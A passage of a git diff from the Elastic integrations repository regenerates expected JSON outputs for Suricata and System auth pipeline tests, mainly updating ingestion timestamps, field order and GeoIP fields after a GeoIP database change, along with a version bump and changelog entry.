"protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-23T02:03:36.626Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "2a04:4e42:0200:0000:0000:0000:0000:0729", - "2a04:4e42:0400:0000:0000:0000:0000:0729", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -1895,8 +1883,13 @@ "flow_id": "928596784370390" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.598028100Z", + "ingested": "2021-12-14T14:55:20.366683269Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.626559+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":59203,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":12859,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":269,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}]}}", "category": [ "network" @@ -1906,6 +1899,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } } ] diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json index 9d0d9645126..db197451f6b 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json @@ -17,19 +17,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -151,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:29.262566900Z", + "ingested": "2021-12-14T14:55:23.036415272Z", "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"175.16.199.1\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json index 8da063a5247..dc52426d093 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log-expected.json @@ -37,7 +37,7 @@ "ip": "192.168.86.85" }, "event": { - "ingested": "2021-12-09T13:45:29.680219800Z", + "ingested": "2021-12-14T14:55:23.439672828Z", "original": "{\"timestamp\":\"2018-07-05T15:01:09.820360-0400\",\"flow_id\":298824096901438,\"in_iface\":\"en0\",\"event_type\":\"ssh\",\"src_ip\":\"192.168.86.85\",\"src_port\":55406,\"dest_ip\":\"192.168.253.112\",\"dest_port\":22,\"proto\":\"TCP\",\"ssh\":{\"client\":{\"proto_version\":\"2.0\",\"software_version\":\"OpenSSH_7.6\"},\"server\":{\"proto_version\":\"2.0\",\"software_version\":\"libssh_0.7.0\"}}}", "category": [ "network" @@ -126,7 +126,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:45:29.680225600Z", + "ingested": "2021-12-14T14:55:23.439675097Z", "original": "{\"timestamp\":\"2018-07-05T15:07:20.910626-0400\",\"flow_id\":904992230150281,\"in_iface\":\"en0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.86.85\",\"src_port\":55641,\"dest_ip\":\"192.168.156.70\",\"dest_port\":443,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2024833,\"rev\":3,\"signature\":\"ET POLICY Observed IP Lookup Domain (l2 .io in TLS SNI)\",\"category\":\"Potential Corporate Privacy Violation\",\"severity\":1},\"tls\":{\"session_resumed\":true,\"sni\":\"l2.io\",\"version\":\"TLS 1.2\"},\"app_proto\":\"tls\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":793,\"bytes_toclient\":343,\"start\":\"2018-07-05T15:07:19.659593-0400\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -199,7 +199,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680230400Z", + "ingested": "2021-12-14T14:55:23.439675485Z", "original": "{\"timestamp\":\"2018-07-05T15:43:47.690014-0400\",\"flow_id\":2115002772430095,\"in_iface\":\"en0\",\"event_type\":\"http\",\"src_ip\":\"192.168.86.85\",\"src_port\":56119,\"dest_ip\":\"192.168.86.28\",\"dest_port\":63963,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"192.168.86.28\",\"url\":\"\\/dd.xml\",\"http_user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\",\"http_content_type\":\"text\\/xml\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1155}}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -298,7 +298,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680234200Z", + "ingested": "2021-12-14T14:55:23.439675822Z", "original": "{\"timestamp\":\"2018-07-05T15:44:33.222441-0400\",\"flow_id\":2211411903323127,\"in_iface\":\"en0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.86.28\",\"src_port\":8008,\"dest_ip\":\"192.168.86.85\",\"dest_port\":56118,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.86.28\",\"url\":\"\\/ssdp\\/device-desc.xml\",\"http_user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\",\"http_content_type\":\"application\\/xml\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1071},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/ssdp\\/device-desc.xml\",\"gaps\":false,\"state\":\"CLOSED\",\"md5\":\"427b7337ff37eeb24d74f47d8e04cf21\",\"sha1\":\"313573490192c685e9e53abef25453ed0d5e2aee\",\"sha256\":\"f610428ebddf6f8cf9e39322e672583c45fcdcf885efad0ab48fd53a3dfc2c4b\",\"stored\":false,\"size\":1071,\"tx_id\":0}}", "category": [ "network" @@ -321,6 +321,16 @@ } }, { + "@timestamp": "2018-07-05T19:51:20.213Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "192.168.86.1" + ] + }, "destination": { "port": 39464, "address": "192.168.86.85" @@ -346,28 +356,6 @@ }, "type": "answer" }, - "source": { - "port": 53, - "address": "192.168.86.1", - "ip": "192.168.86.1" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2018-07-05T19:51:20.213Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "192.168.86.1" - ] - }, "suricata": { "eve": { "in_iface": "en0", @@ -384,8 +372,13 @@ "flow_id": "1684780223079543" } }, + "source": { + "port": 53, + "address": "192.168.86.1", + "ip": "192.168.86.1" + }, "event": { - "ingested": "2021-12-09T13:45:29.680238700Z", + "ingested": "2021-12-14T14:55:23.439676148Z", "original": "{\"timestamp\":\"2018-07-05T15:51:20.213418-0400\",\"flow_id\":1684780223079543,\"in_iface\":\"en0\",\"event_type\":\"dns\",\"src_ip\":\"192.168.86.1\",\"src_port\":53,\"dest_ip\":\"192.168.86.85\",\"dest_port\":39464,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":12308,\"rcode\":\"NOERROR\",\"rrname\":\"clients.l.google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" @@ -395,6 +388,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { @@ -562,7 +562,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680244100Z", + "ingested": "2021-12-14T14:55:23.439676475Z", "original": "{\"timestamp\":\"2018-07-05T15:51:23.009510-0400\",\"event_type\":\"stats\",\"stats\":{\"uptime\":5400,\"capture\":{\"kernel_packets\":430313,\"kernel_drops\":0,\"kernel_ifdrops\":0},\"decoder\":{\"pkts\":430313,\"bytes\":335138381,\"invalid\":2,\"ipv4\":425873,\"ipv6\":3785,\"ethernet\":430313,\"raw\":0,\"null\":0,\"sll\":0,\"tcp\":370093,\"udp\":58337,\"sctp\":0,\"icmpv4\":186,\"icmpv6\":1019,\"ppp\":0,\"pppoe\":0,\"gre\":0,\"vlan\":0,\"vlan_qinq\":0,\"ieee8021ah\":0,\"teredo\":1,\"ipv4_in_ipv6\":0,\"ipv6_in_ipv6\":0,\"mpls\":0,\"avg_pkt_size\":778,\"max_pkt_size\":1514,\"erspan\":0,\"ipraw\":{\"invalid_ip_version\":0},\"ltnull\":{\"pkt_too_small\":0,\"unsupported_type\":0},\"dce\":{\"pkt_too_small\":0}},\"flow\":{\"memcap\":0,\"tcp\":1113,\"udp\":1881,\"icmpv4\":0,\"icmpv6\":677,\"spare\":10000,\"emerg_mode_entered\":0,\"emerg_mode_over\":0,\"tcp_reuse\":0,\"memuse\":11537312},\"defrag\":{\"ipv4\":{\"fragments\":0,\"reassembled\":0,\"timeouts\":0},\"ipv6\":{\"fragments\":0,\"reassembled\":0,\"timeouts\":0},\"max_frag_hits\":0},\"tcp\":{\"sessions\":842,\"ssn_memcap_drop\":0,\"pseudo\":0,\"pseudo_failed\":0,\"invalid_checksum\":0,\"no_flow\":0,\"syn\":1138,\"synack\":656,\"rst\":1165,\"segment_memcap_drop\":0,\"stream_depth_reached\":63,\"reassembly_gap\":0,\"overlap\":5979,\"overlap_diff_data\":0,\"insert_data_normal_fail\":0,\"insert_data_overlap_fail\":0,\"insert_list_fail\":0,\"memuse\":4587520,\"reassembly_memuse\":768000},\"detect\":{\"alert\":2},\"app_layer\":{\"flow\":{\"http\":22,\"ftp\":0,\"smtp\":0,\"tls\":560,\"ssh\":4,\"imap\":0,\"msn\":0,\"smb\":0,\"dcerpc_tcp\":0,\"dns_tcp\":0,\"failed_tcp\":2,\"dcerpc_udp\":0,\"dns_udp\":762,\"failed_udp\":1119},\"tx\":{\"http\":25,\"ftp\":0,\"smtp\":0,\"tls\":0,\"ssh\":0,\"smb\":0,\"dcerpc_tcp\":0,\"dns_tcp\":0,\"dcerpc_udp\":0,\"dns_udp\":762}},\"flow_mgr\":{\"closed_pruned\":729,\"new_pruned\":1879,\"est_pruned\":975,\"bypassed_pruned\":0,\"flows_checked\":8,\"flows_notimeout\":8,\"flows_timeout\":0,\"flows_timeout_inuse\":0,\"flows_removed\":0,\"rows_checked\":65536,\"rows_skipped\":65530,\"rows_empty\":0,\"rows_busy\":0,\"rows_maxlen\":2},\"file_store\":{\"open_files\":0},\"dns\":{\"memuse\":7749,\"memcap_state\":0,\"memcap_global\":0},\"http\":{\"memuse\":17861,\"memcap\":0}}}", "category": [ "network" @@ -575,23 +575,6 @@ ] }, { - "destination": { - "port": 443, - "address": "17.142.164.13", - "domain": "p33-btmmdns.icloud.com" - }, - "source": { - "port": 56187, - "address": "192.168.86.85", - "ip": "192.168.86.85" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "tls", - "transport": "tcp" - }, "@timestamp": "2018-07-05T19:51:50.666Z", "ecs": { "version": "1.12.0" @@ -604,6 +587,11 @@ "192.168.86.85" ] }, + "destination": { + "port": 443, + "address": "17.142.164.13", + "domain": "p33-btmmdns.icloud.com" + }, "suricata": { "eve": { "in_iface": "en0", @@ -655,8 +643,13 @@ "version": "1.2", "version_protocol": "tls" }, + "source": { + "port": 56187, + "address": "192.168.86.85", + "ip": "192.168.86.85" + }, "event": { - "ingested": "2021-12-09T13:45:29.680248300Z", + "ingested": "2021-12-14T14:55:23.439676810Z", "original": "{\"timestamp\":\"2018-07-05T15:51:50.666597-0400\",\"flow_id\":89751777876473,\"in_iface\":\"en0\",\"event_type\":\"tls\",\"src_ip\":\"192.168.86.85\",\"src_port\":56187,\"dest_ip\":\"17.142.164.13\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"CN=*.icloud.com, OU=management:idms.group.506364, O=Apple Inc., ST=California, C=US\",\"issuerdn\":\"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US\",\"serial\":\"5C:9C:E1:09:78:87:F8:07\",\"fingerprint\":\"6a:ff:ac:a6:5f:8a:05:e7:a9:8c:76:29:b9:08:c7:69:ad:dc:72:47\",\"sni\":\"p33-btmmdns.icloud.com.\",\"version\":\"TLS 1.2\",\"notbefore\":\"2017-02-27T17:54:31\",\"notafter\":\"2019-03-29T17:54:31\"}}", "category": [ "network" @@ -666,6 +659,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "tls", + "transport": "tcp" } }, { @@ -705,7 +705,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:45:29.680252400Z", + "ingested": "2021-12-14T14:55:23.439679061Z", "original": "{\"timestamp\":\"2018-07-05T15:51:54.001329-0400\",\"flow_id\":1828507008887644,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:fada:0cff:fedc:87f1\",\"src_port\":546,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0001:0002\",\"dest_port\":547,\"proto\":\"UDP\",\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":0,\"bytes_toserver\":110,\"bytes_toclient\":0,\"start\":\"2018-07-05T15:51:23.453468-0400\",\"end\":\"2018-07-05T15:51:23.453468-0400\",\"age\":0,\"state\":\"new\",\"reason\":\"timeout\",\"alerted\":false}}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -786,7 +786,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680255700Z", + "ingested": "2021-12-14T14:55:23.439679432Z", "original": "{\"timestamp\":\"2020-12-09T16:02:43.000505+0000\",\"flow_id\":913701662641234,\"in_iface\":\"eno6\",\"event_type\":\"http\",\"src_ip\":\"192.168.50.1\",\"src_port\":57134,\"dest_ip\":\"192.168.50.1\",\"dest_port\":8080,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"ctldl.windowsupdate.com\",\"url\":\"http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?111111111111\",\"http_user_agent\":\"Microsoft-CryptoAPI/10.0\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"length\":0}}", "category": [ "network", @@ -809,22 +809,6 @@ } }, { - "destination": { - "port": 443, - "address": "192.168.50.1" - }, - "source": { - "port": 60614, - "address": "192.168.50.1", - "ip": "192.168.50.1" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "tls", - "transport": "tcp" - }, "@timestamp": "2020-12-09T16:02:58.005Z", "ecs": { "version": "1.12.0" @@ -837,6 +821,10 @@ "192.168.50.1" ] }, + "destination": { + "port": 443, + "address": "192.168.50.1" + }, "suricata": { "eve": { "in_iface": "eno6", @@ -890,8 +878,13 @@ "version": "1.2", "version_protocol": "tls" }, + "source": { + "port": 60614, + "address": "192.168.50.1", + "ip": "192.168.50.1" + }, "event": { - "ingested": "2021-12-09T13:45:29.680259900Z", + "ingested": "2021-12-14T14:55:23.439679758Z", "original": "{\"timestamp\":\"2020-12-09T16:02:58.005716+0000\",\"flow_id\":1298574590709840,\"in_iface\":\"eno6\",\"event_type\":\"tls\",\"src_ip\":\"192.168.50.1\",\"src_port\":60614,\"dest_ip\":\"192.168.50.1\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=New York, L=New York City, O=Acme U.S.A., INC., CN=update.acme.com\",\"issuerdn\":\"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018\",\"serial\":\"0D:CE:DC:BC:AF:92:56:B4:C5:41:40:71:26:5B:1D:53\",\"fingerprint\":\"18:3c:11:45:46:e9:26:c7:87:64:0f:ed:47:86:1b:31:bf:0f:84:25\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-11-24T00:00:00\",\"notafter\":\"2021-12-25T23:59:59\",\"ja3\":{},\"ja3s\":{\"hash\":\"adc06261ef82c2e4688b3cf08c1b2f24\",\"string\":\"771,159,65281\"}}}", "category": [ "network" @@ -901,6 +894,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "tls", + "transport": "tcp" } }, { @@ -961,7 +961,7 @@ } }, "event": { - "ingested": "2021-12-09T13:45:29.680265300Z", + "ingested": "2021-12-14T14:55:23.439680084Z", "original": "{\"timestamp\":\"2020-12-09T16:03:00.179037+0000\",\"flow_id\":1097935193623328,\"in_iface\":\"eno6\",\"event_type\":\"http\",\"src_ip\":\"192.168.50.1\",\"src_port\":50898,\"dest_ip\":\"192.168.50.1\",\"dest_port\":8081,\"proto\":\"TCP\",\"tx_id\":0,\"http\":{\"hostname\":\"192.168.50.1\",\"http_port\":8081,\"url\":\"/uuid\",\"http_user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0\",\"http_method\":\"POST\",\"protocol\":\"HTTP/1.1\",\"length\":0}}", "category": [ "network", @@ -989,23 +989,6 @@ } }, { - "destination": { - "port": 443, - "address": "192.168.50.1", - "domain": "www.example.com" - }, - "source": { - "port": 12509, - "address": "192.168.50.1", - "ip": "192.168.50.1" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "tls", - "transport": "tcp" - }, "@timestamp": "2020-12-09T16:03:50.083Z", "ecs": { "version": "1.12.0" @@ -1015,6 +998,11 @@ "192.168.50.1" ] }, + "destination": { + "port": 443, + "address": "192.168.50.1", + "domain": "www.example.com" + }, "suricata": { "eve": { "in_iface": "eno6", @@ -1037,8 +1025,13 @@ "ja3": "44d502d471cfdb99c59bdfb0f220e5a8" } }, + "source": { + "port": 12509, + "address": "192.168.50.1", + "ip": "192.168.50.1" + }, "event": { - "ingested": "2021-12-09T13:45:29.680271100Z", + "ingested": "2021-12-14T14:55:23.439680635Z", "original": "{\"timestamp\":\"2020-12-09T16:03:50.083307+0000\",\"flow_id\":289459143040794,\"in_iface\":\"eno6\",\"event_type\":\"tls\",\"src_ip\":\"192.168.50.1\",\"src_port\":12509,\"dest_ip\":\"192.168.50.1\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"sni\":\"www.example.com\",\"version\":\"UNDETERMINED\",\"ja3\":{\"hash\":\"44d502d471cfdb99c59bdfb0f220e5a8\",\"string\":\"771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-41,29-23-24,0\"},\"ja3s\":{}}}", "category": [ "network" @@ -1048,6 +1041,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "tls", + "transport": "tcp" } } ] diff --git a/packages/suricata/manifest.yml b/packages/suricata/manifest.yml index 5d76ac99ff5..60b62930a7f 100644 --- a/packages/suricata/manifest.yml +++ b/packages/suricata/manifest.yml @@ -1,6 +1,6 @@ name: suricata title: Suricata Events -version: 1.3.1 +version: 1.3.2 release: ga description: Collect and parse event logs from Suricata instances with Elastic Agent. type: integration diff --git a/packages/system/changelog.yml b/packages/system/changelog.yml index 94faf46896a..4a89813af0d 100644 --- a/packages/system/changelog.yml +++ b/packages/system/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.6.6" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.6.5" changes: - description: Change test public IPs to the supported subset diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json index 48c56ff37ae..5606ca64fdf 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json @@ -24,7 +24,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403832700Z", + "ingested": "2021-12-14T14:55:29.808129024Z", "timezone": "+0000", "kind": "event" }, @@ -64,7 +64,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403841800Z", + "ingested": "2021-12-14T14:55:29.808131455Z", "timezone": "+0000", "kind": "event" }, @@ -99,7 +99,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403847800Z", + "ingested": "2021-12-14T14:55:29.808131907Z", "timezone": "+0000", "kind": "event" }, @@ -135,7 +135,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403853600Z", + "ingested": "2021-12-14T14:55:29.808132319Z", "timezone": "+0000", "kind": "event" }, @@ -175,7 +175,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403859600Z", + "ingested": "2021-12-14T14:55:29.808132773Z", "timezone": "+0000", "kind": "event" }, @@ -206,7 +206,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403866400Z", + "ingested": "2021-12-14T14:55:29.808133158Z", "timezone": "+0000", "kind": "event" }, @@ -236,7 +236,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403872100Z", + "ingested": "2021-12-14T14:55:29.808133537Z", "timezone": "+0000", "kind": "event" }, @@ -272,7 +272,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403878700Z", + "ingested": "2021-12-14T14:55:29.808133917Z", "timezone": "+0000", "kind": "event" }, @@ -305,7 +305,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403884200Z", + "ingested": "2021-12-14T14:55:29.808134316Z", "timezone": "+0000", "kind": "event" }, @@ -327,7 +327,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:45:36.403889300Z", + "ingested": "2021-12-14T14:55:29.808134698Z", "timezone": "+0000", "kind": "event" }, @@ -364,7 +364,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403895200Z", + "ingested": "2021-12-14T14:55:29.808135160Z", "timezone": "+0000", "kind": "event" }, @@ -399,7 +399,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403900Z", + "ingested": "2021-12-14T14:55:29.808135744Z", "timezone": "+0000", "kind": "event" }, @@ -433,7 +433,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403904600Z", + "ingested": "2021-12-14T14:55:29.808136145Z", "timezone": "+0000", "kind": "event" }, @@ -463,7 +463,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403908300Z", + "ingested": "2021-12-14T14:55:29.808136536Z", "timezone": "+0000", "kind": "event" }, @@ -508,7 +508,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.403913200Z", + "ingested": "2021-12-14T14:55:29.808136913Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -550,7 +550,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403918200Z", + "ingested": "2021-12-14T14:55:29.808137312Z", "timezone": "+0000", "kind": "event" }, @@ -594,7 +594,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403923400Z", + "ingested": "2021-12-14T14:55:29.808137815Z", "timezone": "+0000", "kind": "event" }, @@ -636,7 +636,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403928300Z", + "ingested": "2021-12-14T14:55:29.808138204Z", "timezone": "+0000", "kind": "event" }, @@ -671,7 +671,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403934400Z", + "ingested": "2021-12-14T14:55:29.808138585Z", "timezone": "+0000", "kind": "event" }, @@ -707,7 +707,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403938800Z", + "ingested": "2021-12-14T14:55:29.808138962Z", "timezone": "+0000", "kind": "event" }, @@ -752,7 +752,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.403943300Z", + "ingested": "2021-12-14T14:55:29.808139353Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -794,7 +794,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403947400Z", + "ingested": "2021-12-14T14:55:29.808139737Z", "timezone": "+0000", "kind": "event" }, @@ -828,7 +828,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403952400Z", + "ingested": "2021-12-14T14:55:29.808140121Z", "timezone": "+0000", "kind": "event" }, @@ -858,7 +858,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403958200Z", + "ingested": "2021-12-14T14:55:29.808140668Z", "timezone": "+0000", "kind": "event" }, @@ -891,7 +891,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403964100Z", + "ingested": "2021-12-14T14:55:29.808141052Z", "timezone": "+0000", "kind": "event" }, @@ -928,7 +928,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403969800Z", + "ingested": "2021-12-14T14:55:29.808141438Z", "timezone": "+0000", "kind": "event" }, @@ -973,7 +973,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.403975600Z", + "ingested": "2021-12-14T14:55:29.808141839Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1015,7 +1015,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403980100Z", + "ingested": "2021-12-14T14:55:29.808142290Z", "timezone": "+0000", "kind": "event" }, @@ -1049,7 +1049,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403984700Z", + "ingested": "2021-12-14T14:55:29.808142679Z", "timezone": "+0000", "kind": "event" }, @@ -1079,7 +1079,7 @@ "hostname": "precise32" }, "event": { - "ingested": 